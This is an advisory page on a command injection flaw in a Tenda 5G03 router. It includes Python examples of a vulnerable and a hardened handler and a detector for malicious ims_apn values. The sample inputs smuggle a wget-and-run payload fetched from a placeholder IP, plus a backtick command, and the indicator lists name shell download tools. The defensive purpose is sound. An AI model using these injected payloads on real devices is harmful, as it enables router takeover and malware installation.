
CVE-2026-38065: Tenda 5G03 RCE Vulnerability

CVE-2026-38065 is a command injection flaw in Tenda 5G03 V05.03.02.04 that enables remote code execution through the ims_apn parameter. This article covers technical details, affected versions, and mitigation steps.


CVE-2026-38065 Overview

CVE-2026-38065 is a command injection vulnerability in the Tenda 5G03 router running firmware V05.03.02.04 (Version 1.0). The flaw resides in the action_ims_on_with_apn function, where the value of the ims_apn parameter is spliced into a shell command without validation or escaping. Unauthenticated attackers with network access to the device's web interface can inject arbitrary operating system commands. Successful exploitation gives full control of the router, enabling traffic interception, lateral movement, and persistent compromise of the network perimeter. The vulnerability is tracked under CWE-78 (OS Command Injection).

Critical Impact

Unauthenticated remote attackers can execute arbitrary OS commands on affected Tenda 5G03 routers with the privileges of the web management daemon, which on consumer routers typically runs as root, fully compromising the device and the networks it serves.

Affected Products

  • Tenda 5G03 router
  • Firmware version V05.03.02.04
  • Version 1.0 hardware revision

Discovery Timeline

  • 2026-06-15 - CVE-2026-38065 published to NVD
  • 2026-06-17 - Last updated in NVD database

Technical Details for CVE-2026-38065

Vulnerability Analysis

The vulnerability is an OS command injection flaw in the Tenda 5G03 web management interface. The action_ims_on_with_apn handler accepts the ims_apn parameter from HTTP requests and incorporates the value directly into a shell command string. Because the parameter is not validated, escaped, or restricted to the characters a legitimate APN can contain (letters, digits, dots and hyphens), an attacker can embed shell metacharacters such as ;, |, &, $() or backticks to terminate the intended command and append their own. The injected payload executes with the privileges of the web server process, which on consumer routers typically runs as root. The EPSS score at the time of writing ranks the CVE in the 67th percentile of all scored vulnerabilities; EPSS is a model estimate of exploitation likelihood, not evidence that this specific CVE has been exploited, though command injection in consumer network equipment is a class that botnet operators adopt quickly.

Root Cause

The root cause is the absence of input validation and unsafe command construction in action_ims_on_with_apn. Attacker-controlled data flows directly from the HTTP request into a shell interpreter, satisfying the classic conditions for CWE-78. The handler treats the ims_apn value as trusted configuration data rather than untrusted user input.
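To make the root cause concrete, the following is an added example in Python (illustrative code, not Tenda's firmware, whose handler is native code): a model of the command-string construction the advisory attributes to action_ims_on_with_apn, beside a hardened version that allowlists the APN and builds an argv for exec without a shell. The ims_ctl command, the handler function names and the APN grammar are assumptions; the request bodies are constructed.

```python
# Added example (not Tenda firmware code): a Python model of the CWE-78 pattern
# the advisory describes in action_ims_on_with_apn, beside a hardened equivalent.
# Names such as ims_ctl, handle_vulnerable and handle_hardened are assumptions.
import re
from typing import List
from urllib.parse import parse_qs

# APN values are DNS-like labels: letters, digits, '.' and '-', no whitespace or
# shell metacharacters. The exact grammar the firmware should accept is an assumption.
APN_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9.-]{0,98}[A-Za-z0-9])?$")


def ims_apn_from_body(body: str) -> str:
    """Pull the ims_apn field out of a URL-encoded POST body (decodes %XX and '+')."""
    fields = parse_qs(body, keep_blank_values=True)
    return fields.get("ims_apn", [""])[0]


def handle_vulnerable(body: str) -> str:
    """Models the flaw: the parameter is spliced verbatim into a shell command string.
    In the real handler the string goes to system(); here it is only returned."""
    apn = ims_apn_from_body(body)
    return f"ims_ctl --on --apn {apn}"


def apn_is_valid(apn: str) -> bool:
    """Allowlist check: True only for a plausible APN, never for shell syntax."""
    return APN_RE.fullmatch(apn) is not None


def handle_hardened(body: str) -> List[str]:
    """Allowlist the value, then build an argv list for exec*() with no shell at all.
    Returns the argv; a real handler would hand it to execv() or subprocess.run(shell=False)."""
    apn = ims_apn_from_body(body)
    if not apn_is_valid(apn):
        raise ValueError(f"rejected ims_apn: {apn!r}")
    return ["ims_ctl", "--on", "--apn", apn]


if __name__ == "__main__":
    # Constructed request bodies: a benign APN and one carrying an injected command
    # (URL-encoded ';' and spaces, as a browser or curl would send them).
    benign = "ims_apn=internet.example.net"
    hostile = "ims_apn=internet%3Bwget+http%3A%2F%2F198.51.100.7%2Fx+-O+%2Ftmp%2Fx%3Bsh+%2Ftmp%2Fx"
    print(handle_vulnerable(benign))
    print(handle_vulnerable(hostile))   # the decoded ';' terminates the intended command
    print(handle_hardened(benign))
    try:
        handle_hardened(hostile)
    except ValueError as err:
        print(err)
```

The vulnerable variant returns the assembled string rather than running it, so the example is safe to execute; the point is that the URL-decoded ';' splits the intended command into two. The hardened variant removes the shell from the data path entirely, so metacharacters lose their meaning even if the allowlist were later loosened; the allowlist then serves as defence in depth rather than the only barrier.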

Attack Vector

Exploitation requires only network reachability to the router's web interface. No authentication or user interaction is required. An attacker sends a crafted HTTP request to the vulnerable endpoint with shell metacharacters embedded in the ims_apn parameter. The injected commands run immediately on the device, allowing the attacker to spawn reverse shells, modify firewall rules, dump credentials, or recruit the router into a botnet. A proof-of-concept is publicly hosted in the GitHub PoC Repository.

No verified exploit code is reproduced here. See the linked PoC repository for technical details on request structure and payload formatting.

Detection Methods for CVE-2026-38065

Indicators of Compromise

  • Outbound connections from the router management interface to unfamiliar IP addresses, especially over non-standard ports.
  • HTTP POST requests targeting endpoints that invoke action_ims_on_with_apn with shell metacharacters (;, |, &, `, $()) in the ims_apn field.
  • Unexpected processes such as sh, wget, curl, tftp, or nc spawned by the router's HTTP daemon.
  • Modified firewall, NAT, or DNS configurations that were not initiated by an administrator.

Detection Strategies

  • Inspect HTTP traffic to the router's LAN-side management interface for ims_apn values that, after URL-decoding, contain shell control characters; matching only the raw encoded request misses payloads sent as %3B, %7C or %60.
  • Correlate router configuration changes with administrative session logs to identify out-of-band modifications.
  • Monitor DNS resolution from the router for queries to known malware command-and-control infrastructure.
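As an added example (not part of the advisory or any vendor tooling), the ims_apn indicator and the traffic-inspection strategy from the two lists above, implemented in Python and run over constructed request records. The record layout, the endpoint path /example/ims_apn and the addresses are assumptions; in practice the records would come from a proxy, IDS or packet capture that retains request bodies, since ordinary access logs do not.

```python
# Added example, not from the advisory or vendor tooling: detection logic for the
# ims_apn indicator, run over constructed request records. The record layout
# ("<timestamp> <src_ip> <method> <target> [<body>]"), the endpoint path
# /example/ims_apn and the addresses are assumptions.
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

# Shell metacharacters that end or chain a command: ';', '|', '&', backtick,
# newline, and the '$(' opener of command substitution.
SHELL_META_RE = re.compile(r"[;|&`\n]|\$\(")

RECORD_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<target>\S+)(?: (?P<body>.*))?$"
)


def ims_apn_values(target: str, body: Optional[str]) -> List[str]:
    """Every ims_apn value in the query string and form body, URL-decoded
    the way the router's CGI layer would decode it before use."""
    values: List[str] = []
    for source in (urlsplit(target).query, body or ""):
        values.extend(parse_qs(source, keep_blank_values=True).get("ims_apn", []))
    return values


def inspect_record(line: str) -> Optional[Dict[str, str]]:
    """Alert dict when a record carries an ims_apn value with shell metacharacters,
    None for benign or unparseable records."""
    m = RECORD_RE.match(line)
    if not m:
        return None
    for apn in ims_apn_values(m["target"], m["body"]):
        hit = SHELL_META_RE.search(apn)
        if hit:
            return {"ts": m["ts"], "src": m["src"], "ims_apn": apn, "meta": hit.group(0)}
    return None


def scan(lines: List[str]) -> List[Dict[str, str]]:
    """Run inspect_record over a batch of records and keep only the alerts."""
    return [alert for alert in map(inspect_record, lines) if alert]


# Constructed records: one benign APN change from a LAN host, two hostile
# requests from a WAN address carrying encoded ';' and backtick payloads,
# and an unrelated page fetch.
SAMPLE_RECORDS = [
    "2026-06-16T10:02:11Z 192.168.0.23 POST /example/ims_apn ims_apn=internet.example.net",
    "2026-06-16T10:02:19Z 203.0.113.45 POST /example/ims_apn "
    "ims_apn=x%3Bwget+http%3A%2F%2F198.51.100.7%2Fa+-O+%2Ftmp%2Fa%3Bsh+%2Ftmp%2Fa",
    "2026-06-16T10:02:25Z 203.0.113.45 GET /example/ims_apn?ims_apn=x%60id%60",
    "2026-06-16T10:03:01Z 192.168.0.23 GET /index.html",
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_RECORDS):
        print(f"{alert['ts']} {alert['src']} ims_apn={alert['ims_apn']!r} meta={alert['meta']!r}")
```

Decoding before matching is the part that matters: the second and third records carry no literal metacharacter on the wire, only %3B and %60, and a rule that greps the raw request for ';' or a backtick would pass them. The detector checks both the query string and the body because a CGI handler that reads form fields generically will usually accept the parameter from either.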

Monitoring Recommendations

  • Forward router syslog and web access logs to a centralized SIEM for long-term retention and analysis.
  • Alert on any inbound connection attempts to the router's management interface originating from WAN-facing networks.
  • Baseline normal egress traffic from the router and alert on deviations such as new outbound TCP sessions initiated by the device itself.

How to Mitigate CVE-2026-38065

Immediate Actions Required

  • Disable remote (WAN-side) administration on the Tenda 5G03 device until a vendor patch is available.
  • Restrict access to the LAN management interface using network segmentation and ACLs so only trusted administrative hosts can reach it.
  • Change administrator credentials and review router configuration for unauthorized changes such as DNS hijacking or port forwards.
  • Treat any device confirmed exploited as fully compromised and perform a factory reset followed by reconfiguration from a known-good baseline.

Patch Information

At the time of publication, the CVE record's enrichment data lists no vendor advisory or firmware update for CVE-2026-38065. Monitor Tenda's official support channels for a firmware release that supersedes V05.03.02.04 and corrects the action_ims_on_with_apn handler; until one is available, the network-level controls above are the only defence.

Workarounds

  • Place the router behind an upstream firewall that blocks unsolicited inbound traffic to the management interface.
  • Disable any unused services and features on the device, particularly IMS/APN configuration endpoints if not required.
  • If the device cannot be isolated or patched, replace it with a supported router that receives active security updates.

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
